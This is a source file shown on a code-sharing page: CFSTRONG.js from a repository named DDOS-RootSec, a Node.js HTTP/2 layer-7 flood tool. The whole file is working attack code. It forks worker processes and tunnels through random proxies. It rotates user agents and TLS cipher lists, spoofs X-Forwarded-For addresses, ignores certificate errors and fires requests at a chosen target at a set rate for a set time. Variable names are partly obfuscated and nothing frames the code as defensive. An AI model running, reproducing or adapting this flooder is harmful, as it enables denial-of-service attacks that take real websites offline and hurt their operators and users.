Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/L7/CFSTRONG.js
4607 views
1
process.on("uncaughtException", function (_0xa2cex1) {});

2
process.on("unhandledRejection", function (_0xa2cex1) {});

3
require("events").EventEmitter.defaultMaxListeners = 0;

4
const fs = require("fs");

5
const url = require("url");

6
const randstr = require("randomstring");

7
var path = require("path");

8
const cluster = require("cluster");

9
const http2 = require("http2");

10
var fileName = __filename;

11
var file = path.basename(fileName);

12
let headerbuilders;

13
let COOKIES = undefined;

14
let POSTDATA = undefined;

15
if (process.argv.length < 8) {

16
  console.log(" node CFSTRONG.js [Target] [Time] [Threads] [Method] [Proxy List] [Requests Per IP]");

17
  process.exit(0);

18
}

19
;

20
let randomparam = false;

21
var proxies = fs.readFileSync(process.argv[6], "utf-8").toString().replace(/\r/g, "").split("\n");

22
var rate = process.argv[7];

23
var target_url = process.argv[2];

24
const target = target_url.split('""')[0];

25
process.argv.forEach(_0xa2cex12 => {

26
  if (_0xa2cex12.includes("cookie=") && !process.argv[5].split('""')[0].includes(_0xa2cex12)) {

27
    COOKIES = _0xa2cex12.slice(7);

28
  } else {

29
    if (_0xa2cex12.includes("postdata=") && !process.argv[5].split('""')[0].includes(_0xa2cex12)) {

30
      if (process.argv[5].toUpperCase() != "POST") {

31
        console.error("Method Invalid (Has Postdata But Not POST Method)");

32
        process.exit(1);

33
      }

34
      ;

35
      POSTDATA = _0xa2cex12.slice(9);

36
    } else {

37
      if (_0xa2cex12.includes("randomstring=")) {

38
        randomparam = _0xa2cex12.slice(13);

39
        console.log("[Info] RandomString Mode Enabled.");

40
      } else {

41
        if (_0xa2cex12.includes("headerdata=")) {

42
          headerbuilders = {accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "accept-encoding": "gzip, deflate, br", "accept-language": "en-US,en;q=0.9", "sec-ch-ua": 'Not A;Brand";v="99", "Chromium";v="99", "Opera";v="86", "Microsoft Edge";v="100", "Google Chrome";v="101"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "sec-fetch-dest": "empty", "sec-fetch-site": "cross-site", "sec-fetch-mode": "navigate", "sec-fetch-user": "?1", TE: "trailers", Pragma: "no-cache", "upgrade-insecure-requests": 1, "Cache-Control": "max-age=0", Referer: target, "X-Forwarded-For": spoof(), Cookie: COOKIES, ":method": "GET"};

43
          if (_0xa2cex12.slice(11).split('""')[0].includes("&")) {

44
            const _0xa2cex13 = _0xa2cex12.slice(11).split('""')[0].split("&");

45
            for (let i = 0; i < _0xa2cex13.length; i++) {

46
              const _0xa2cex15 = _0xa2cex13[i].split("=")[0];

47
              const _0xa2cex16 = _0xa2cex13[i].split("=")[1];

48
              headerbuilders[_0xa2cex15] = _0xa2cex16;

49
            }

50
          } else {

51
            const _0xa2cex13 = _0xa2cex12.slice(11).split('""')[0];

52
            const _0xa2cex15 = _0xa2cex13.split("=")[0];

53
            const _0xa2cex16 = _0xa2cex13.split("=")[1];

54
            headerbuilders[_0xa2cex15] = _0xa2cex16;

55
          }

56
        }

57
      }

58
    }

59
  }

60
});

61
if (COOKIES !== undefined) {

62
  console.log("[Info] Custom Cookie Mode Enabled.");

63
} else {

64
  COOKIES = "";

65
}

66
;

67
if (POSTDATA !== undefined) {

68
  console.log("[Info] Custom PostData Mode Enabled.");

69
} else {

70
  POSTDATA = "";

71
}

72
;

73
if (headerbuilders !== undefined) {

74
  console.log("[Info] Custom HeaderData Mode Enabled.");

75
  if (cluster.isMaster) {

76
    for (let i = 0; i < process.argv[7]; i++) {

77
      cluster.fork();

78
    }

79
    ;

80
    console.log("    ███████╗████████╗ █████╗ ██████╗ ████████╗███████╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗     ");

81
    console.log("    ██╔════╝╚══██╔══╝██╔══██╗██╔══██╗╚══██╔══╝██╔════╝██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝     ");

82
    console.log("    ███████╗   ██║   ███████║██████╔╝   ██║   █████╗  ██║  ██║    ███████║   ██║      ██║   ███████║██║     █████╔╝      ");

83
    console.log("    ╚════██║   ██║   ██╔══██║██╔══██╗   ██║   ██╔══╝  ██║  ██║    ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗      ");

84
    console.log("    ███████║   ██║   ██║  ██║██║  ██║   ██║   ███████╗██████╔╝    ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗     ");

85
    console.log("    ╚══════╝   ╚═╝   ╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝   ╚══════╝╚═════╝     ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝     ");

86
    setTimeout(() => {

87
      process.exit(1);

88
    }, process.argv[3] * 1e3);

89
  } else {

90
    startflood();

91
  }

92
} else {

93
  headerbuilders = {accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "accept-encoding": "gzip, deflate, br", "accept-language": "en-US,en;q=0.9", "sec-ch-ua": 'Not A;Brand";v="99", "Chromium";v="99", "Opera";v="86", "Microsoft Edge";v="100", "Google Chrome";v="101"', "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": '"Windows"', "sec-fetch-dest": "empty", "sec-fetch-site": "cross-site", "sec-fetch-mode": "navigate", "sec-fetch-user": "?1", TE: "trailers", Pragma: "no-cache", "upgrade-insecure-requests": 1, "Cache-Control": "max-age=0", Referer: target, "X-Forwarded-For": spoof(), Cookie: COOKIES, ":method": "GET"};

94
  if (cluster.isMaster) {

95
    for (let i = 0; i < process.argv[7]; i++) {

96
      cluster.fork();

97
    }

98
    ;

99
    console.log("    ███████╗████████╗ █████╗ ██████╗ ████████╗███████╗██████╗      █████╗ ████████╗████████╗ █████╗  ██████╗██╗  ██╗     ");

100
    console.log("    ██╔════╝╚══██╔══╝██╔══██╗██╔══██╗╚══██╔══╝██╔════╝██╔══██╗    ██╔══██╗╚══██╔══╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝     ");

101
    console.log("    ███████╗   ██║   ███████║██████╔╝   ██║   █████╗  ██║  ██║    ███████║   ██║      ██║   ███████║██║     █████╔╝      ");

102
    console.log("    ╚════██║   ██║   ██╔══██║██╔══██╗   ██║   ██╔══╝  ██║  ██║    ██╔══██║   ██║      ██║   ██╔══██║██║     ██╔═██╗      ");

103
    console.log("    ███████║   ██║   ██║  ██║██║  ██║   ██║   ███████╗██████╔╝    ██║  ██║   ██║      ██║   ██║  ██║╚██████╗██║  ██╗     ");

104
    console.log("    ╚══════╝   ╚═╝   ╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝   ╚══════╝╚═════╝     ╚═╝  ╚═╝   ╚═╝      ╚═╝   ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝     ");

105
    setTimeout(() => {

106
      process.exit(1);

107
    }, process.argv[3] * 1e3);

108
  } else {

109
    startflood();

110
  }

111
}

112
;

113
var parsed = url.parse(target);

114
process.setMaxListeners(0);

115
function ra() {

116
  const _0xa2cex19 = randstr.generate({charset: "0123456789ABCDEFGHIJKLMNOPQRSTUVWSYZabcdefghijklmnopqrstuvwsyz0123456789", length: 4});

117
  return _0xa2cex19;

118
}

119
const UAs = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0", "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0", "Opera/4.0 (Windows NT 3.0; rv:2.0.1) Gecko/20100101 Firefox/3.0.3", "Opera/5.0 (compatible; Windows NT 6.9; en-us) Gecko/20180224 Chrome/35.1.271.187 Safari/592.28"];

120
function spoof() {

121
  return `${""}${randstr.generate({length: 1, charset: "12"})}${""}${randstr.generate({length: 1, charset: "012345"})}${""}${randstr.generate({length: 1, charset: "012345"})}${"."}${randstr.generate({length: 1, charset: "12"})}${""}${randstr.generate({length: 1, charset: "012345"})}${""}${randstr.generate({length: 1, charset: "012345"})}${"."}${randstr.generate({length: 1, charset: "12"})}${""}${randstr.generate({length: 1, charset: "012345"})}${""}${randstr.generate({length: 1, charset: "012345"})}${"."}${randstr.generate({length: 1, charset: "12"})}${""}${randstr.generate({length: 1, charset: "012345"})}${""}${randstr.generate({length: 1, charset: "012345"})}${""}`;

122
}

123
const cplist = ["options2.TLS_AES_128_GCM_SHA256:options2.TLS_AES_256_GCM_SHA384:options2.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA:options2.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256:options2.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256:options2.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA:options2.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384:options2.TLS_ECDHE_ECDSA_WITH_RC4_128_SHA:options2.TLS_RSA_WITH_AES_128_CBC_SHA:options2.TLS_RSA_WITH_AES_128_CBC_SHA256:options2.TLS_RSA_WITH_AES_128_GCM_SHA256:options2.TLS_RSA_WITH_AES_256_CBC_SHA", "TLS_AES_256_GCM_SHA384:TLS_CHACHA20_POLY1305_SHA256:TLS_AES_128_GCM_SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA384:DHE-RSA-AES256-SHA384:ECDHE-RSA-AES256-SHA256:DHE-RSA-AES256-SHA256:HIGH:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!SRP:!CAMELLIA", ":ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!3DES:!MD5:!PSK", "RC4-SHA:RC4:ECDHE-RSA-AES256-SHA:AES256-SHA:HIGH:!MD5:!aNULL:!EDH:!AESGCM", "ECDHE-RSA-AES256-SHA:RC4-SHA:RC4:HIGH:!MD5:!aNULL:!EDH:!AESGCM", "ECDHE-RSA-AES256-SHA:AES256-SHA:HIGH:!AESGCM:!CAMELLIA:!3DES:!EDH"];

124
function startflood() {

125
  if (process.argv[5].toUpperCase() == "POST") {

126
    const _0xa2cex1e = url.parse(target).path.replace("%RAND%", ra());

127
    headerbuilders[":method"] = "POST";

128
    headerbuilders["Content-Type"] = "text/plain";

129
    if (randomparam) {

130
      setInterval(() => {

131
        headerbuilders["User-agent"] = UAs[Math.floor(Math.random() * UAs.length)];

132
        var _0xa2cex1f = cplist[Math.floor(Math.random() * cplist.length)];

133
        var _0xa2cex20 = proxies[Math.floor(Math.random() * proxies.length)];

134
        _0xa2cex20 = _0xa2cex20.split(":");

135
        var _0xa2cex21 = require("http"), _0xa2cex22 = require("tls");

136
        _0xa2cex22.DEFAULT_MAX_VERSION = "TLSv1.3";

137
        var _0xa2cex23 = _0xa2cex21.request({host: _0xa2cex20[0], port: _0xa2cex20[1], ciphers: _0xa2cex1f, method: "CONNECT", path: parsed.host + ":443"}, _0xa2cex24 => {

138
          _0xa2cex23.end();

139
          return;

140
        });

141
        _0xa2cex23.on("connect", function (_0xa2cex25, _0xa2cex26, _0xa2cex15) {

142
          const _0xa2cex27 = http2.connect(parsed.href, {createConnection: () => {

143
            return _0xa2cex22.connect({host: parsed.host, ciphers: _0xa2cex1f, secureProtocol: "TLS_method", servername: parsed.host, challengesToSolve: 5, cloudflareTimeout: 5e3, cloudflareMaxTimeout: 3e4, maxRedirects: 20, followAllRedirects: true, decodeEmails: false, gzip: true, servername: parsed.host, secure: true, rejectUnauthorized: false, ALPNProtocols: ["h2"], socket: _0xa2cex26}, function () {

144
              for (let i = 0; i < rate; i++) {

145
                headerbuilders[":path"] = `${""}${url.parse(target).path.replace("%RAND%", ra())}${"?"}${randomparam}${"="}${randstr.generate({length: 12, charset: "ABCDEFGHIJKLMNOPQRSTUVWSYZabcdefghijklmnopqrstuvwsyz0123456789"})}${""}`;

146
                headerbuilders["X-Forwarded-For"] = spoof();

147
                headerbuilders.Body = `${""}${POSTDATA.includes("%RAND%") ? POSTDATA.replace("%RAND%", ra()) : POSTDATA}${""}`;

148
                headerbuilders.Cookie.replace("%RAND%", ra());

149
                const _0xa2cex23 = _0xa2cex27.request(headerbuilders);

150
                _0xa2cex23.end();

151
                _0xa2cex23.on("response", () => {

152
                  _0xa2cex23.close();

153
                });

154
              }

155
            });

156
          }});

157
        });

158
        _0xa2cex23.end();

159
      });

160
    } else {

161
      setInterval(() => {

162
        headerbuilders["User-agent"] = UAs[Math.floor(Math.random() * UAs.length)];

163
        var _0xa2cex1f = cplist[Math.floor(Math.random() * cplist.length)];

164
        var _0xa2cex20 = proxies[Math.floor(Math.random() * proxies.length)];

165
        _0xa2cex20 = _0xa2cex20.split(":");

166
        var _0xa2cex21 = require("http"), _0xa2cex22 = require("tls");

167
        _0xa2cex22.DEFAULT_MAX_VERSION = "TLSv1.3";

168
        var _0xa2cex23 = _0xa2cex21.request({host: _0xa2cex20[0], port: _0xa2cex20[1], ciphers: _0xa2cex1f, method: "CONNECT", path: parsed.host + ":443"}, _0xa2cex24 => {

169
          _0xa2cex23.end();

170
          return;

171
        });

172
        _0xa2cex23.on("connect", function (_0xa2cex25, _0xa2cex26, _0xa2cex15) {

173
          const _0xa2cex27 = http2.connect(parsed.href, {createConnection: () => {

174
            return _0xa2cex22.connect({host: `${""}${url.parse(target).path.includes("%RAND%") ? _0xa2cex1e : url.parse(target).path}${""}`, ciphers: _0xa2cex1f, secureProtocol: "TLS_method", servername: parsed.host, challengesToSolve: 5, cloudflareTimeout: 5e3, cloudflareMaxTimeout: 3e4, maxRedirects: 20, followAllRedirects: true, decodeEmails: false, gzip: true, servername: parsed.host, secure: true, rejectUnauthorized: false, ALPNProtocols: ["h2"], socket: _0xa2cex26}, function () {

175
              for (let i = 0; i < rate; i++) {

176
                headerbuilders[":path"] = `${""}${url.parse(target).path.replace("%RAND%", ra())}${""}`;

177
                headerbuilders["X-Forwarded-For"] = spoof();

178
                headerbuilders.Body = `${""}${POSTDATA.includes("%RAND%") ? POSTDATA.replace("%RAND%", ra()) : POSTDATA}${""}`;

179
                headerbuilders.Cookie.replace("%RAND%", ra());

180
                const _0xa2cex23 = _0xa2cex27.request(headerbuilders);

181
                _0xa2cex23.end();

182
                _0xa2cex23.on("response", () => {

183
                  _0xa2cex23.close();

184
                });

185
              }

186
            });

187
          }});

188
        });

189
        _0xa2cex23.end();

190
      });

191
    }

192
  } else {

193
    if (process.argv[5].toUpperCase() == "GET") {

194
      headerbuilders[":method"] = "GET";

195
      if (randomparam) {

196
        setInterval(() => {

197
          headerbuilders["User-agent"] = UAs[Math.floor(Math.random() * UAs.length)];

198
          var _0xa2cex1f = cplist[Math.floor(Math.random() * cplist.length)];

199
          var _0xa2cex20 = proxies[Math.floor(Math.random() * proxies.length)];

200
          _0xa2cex20 = _0xa2cex20.split(":");

201
          var _0xa2cex21 = require("http"), _0xa2cex22 = require("tls");

202
          _0xa2cex22.DEFAULT_MAX_VERSION = "TLSv1.3";

203
          var _0xa2cex23 = _0xa2cex21.request({host: _0xa2cex20[0], port: _0xa2cex20[1], ciphers: _0xa2cex1f, method: "CONNECT", path: parsed.host + ":443"}, _0xa2cex24 => {

204
            _0xa2cex23.end();

205
            return;

206
          });

207
          _0xa2cex23.on("connect", function (_0xa2cex25, _0xa2cex26, _0xa2cex15) {

208
            const _0xa2cex27 = http2.connect(parsed.href, {createConnection: () => {

209
              return _0xa2cex22.connect({host: parsed.host, ciphers: _0xa2cex1f, secureProtocol: "TLS_method", servername: parsed.host, challengesToSolve: 5, cloudflareTimeout: 5e3, cloudflareMaxTimeout: 3e4, maxRedirects: 20, followAllRedirects: true, decodeEmails: false, gzip: true, servername: parsed.host, secure: true, rejectUnauthorized: false, ALPNProtocols: ["h2"], socket: _0xa2cex26}, function () {

210
                for (let i = 0; i < rate; i++) {

211
                  headerbuilders[":path"] = `${""}${url.parse(target).path.replace("%RAND%", ra())}${"?"}${randomparam}${"="}${randstr.generate({length: 12, charset: "ABCDEFGHIJKLMNOPQRSTUVWSYZabcdefghijklmnopqrstuvwsyz0123456789"})}${""}`;

212
                  headerbuilders["X-Forwarded-For"] = spoof();

213
                  headerbuilders.Cookie.replace("%RAND%", ra());

214
                  const _0xa2cex23 = _0xa2cex27.request(headerbuilders);

215
                  _0xa2cex23.end();

216
                  _0xa2cex23.on("response", () => {

217
                    _0xa2cex23.close();

218
                  });

219
                }

220
              });

221
            }});

222
          });

223
          _0xa2cex23.end();

224
        });

225
      } else {

226
        setInterval(() => {

227
          headerbuilders["User-agent"] = UAs[Math.floor(Math.random() * UAs.length)];

228
          var _0xa2cex1f = cplist[Math.floor(Math.random() * cplist.length)];

229
          var _0xa2cex20 = proxies[Math.floor(Math.random() * proxies.length)];

230
          _0xa2cex20 = _0xa2cex20.split(":");

231
          var _0xa2cex21 = require("http"), _0xa2cex22 = require("tls");

232
          _0xa2cex22.DEFAULT_MAX_VERSION = "TLSv1.3";

233
          var _0xa2cex23 = _0xa2cex21.request({host: _0xa2cex20[0], port: _0xa2cex20[1], ciphers: _0xa2cex1f, method: "CONNECT", path: parsed.host + ":443"}, _0xa2cex24 => {

234
            _0xa2cex23.end();

235
            return;

236
          });

237
          _0xa2cex23.on("connect", function (_0xa2cex25, _0xa2cex26, _0xa2cex15) {

238
            const _0xa2cex27 = http2.connect(parsed.href, {createConnection: () => {

239
              return _0xa2cex22.connect({host: parsed.host, ciphers: _0xa2cex1f, secureProtocol: "TLS_method", servername: parsed.host, challengesToSolve: 5, cloudflareTimeout: 5e3, cloudflareMaxTimeout: 3e4, maxRedirects: 20, followAllRedirects: true, decodeEmails: false, gzip: true, servername: parsed.host, secure: true, rejectUnauthorized: false, ALPNProtocols: ["h2"], socket: _0xa2cex26}, function () {

240
                for (let i = 0; i < rate; i++) {

241
                  headerbuilders[":path"] = `${""}${url.parse(target).path.replace("%RAND%", ra())}${""}`;

242
                  headerbuilders["X-Forwarded-For"] = spoof();

243
                  headerbuilders.Cookie.replace("%RAND%", ra());

244
                  const _0xa2cex23 = _0xa2cex27.request(headerbuilders);

245
                  _0xa2cex23.end();

246
                  _0xa2cex23.on("response", () => {

247
                    _0xa2cex23.close();

248
                  });

249
                }

250
              });

251
            }});

252
          });

253
          _0xa2cex23.end();

254
        });

255
      }

256
    } else {

257
      console.log("[Info] Invalid Method.");

258
      process.exit(1);

259
    }

260
  }

261
}

262


263